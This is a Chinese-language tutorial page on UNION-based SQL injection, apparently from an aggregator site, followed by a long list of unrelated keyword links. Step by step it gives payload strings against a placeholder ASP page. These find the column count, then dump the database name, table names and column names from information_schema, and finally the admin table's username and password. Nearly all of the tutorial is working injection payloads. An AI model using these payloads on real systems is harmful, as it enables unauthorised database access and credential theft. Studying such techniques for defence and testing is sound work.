sql注入:union联合查询
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,例如有一个网站:www.xxxxx.com/artist.asp?id=2id=2 order by 3 正常id=2 order by 4 不正常order by需要获取字段的总数为3id=2
千家信息网最后更新 2025年01月20日sql注入:union联合查询
例如有一个网站:www.xxxxx.com/artist.asp?id=2
id=2 order by 3 正常id=2 order by 4 不正常
order by需要获取字段的总数为3
id=2 union select 1,2,3id=2 union select 1,2,database() #爆数据库名id=2 union select 1,2,database()
有一些数据,union联合查询后,不会多行显示,就需要先让前面的语句失效
id=-2 union select 1,2,database()id=-2 union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' #已知数据库sqlzhuru,爆表名(第一个表)
因id = -2不存在,带入select * from admin where id=-2报错哦
当然你也可以用下面的这个语句,效果等同于"id=-2"
id=2 and 1=2 union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' #已知数据库sqlzhuru,爆表名(第一个表)id=2 and 1=2 union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' limit 0,1 #已知数据库sqlzhuru,爆表名(第一个表)id=2 and 1=2 union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' limit 1,1 #已知数据库sqlzhuru,爆第二个表
假如得到admin表,继续如下:
id=2 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='admin' limit 1,1 #已知admin表,爆二个列名id=2 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='admin' limit 2,1 #已知admin表,爆三个列名id=2 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x61646d696e limit 2,1 #已知admin表,爆三个列名(十六进制表示admin表)
假如上面得到admin表下的username、password列,接下来就可以列出某某的数据了id=2 and 1=2 union select 1,username,password from admin
数据
数据库
三个
语句
查询
联合
接下来
十六进制
字段
总数
效果
网站
面的
多行
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网络安全管理先进事迹材料
网络安全攻防实战心得体会
网络安全命令的作用
天天乐棋牌软件开发是否安全
数据库软件 类似Excel
网络技术面试问答
能源数据库名称是什么
加强网络安全教育图片
全民健身服务软件开发
杀毒软件是维护网络安全的吗
数据库增加数值
清华同方数据库技术流视频
一般软件开发价格评估
天津技术软件开发服务技术规范
阜阳市网络安全和信息化事务中心
杭州喀尔万网络技术有限公司
网络安全普法公开课
幼儿园相关网络安全宣传
外网访问不了服务器
中小学生网络安全张莉家庭教育
软件开发费税率是
国外有没有网络安全法
天津统一软件开发服务创意
北京赛尔网络技术部
数据库用什么表
纽约理工大学网络安全
游享星域网络技术
网络安全防泄密体系
软件开发项目基本开发过程
深圳网络安全培训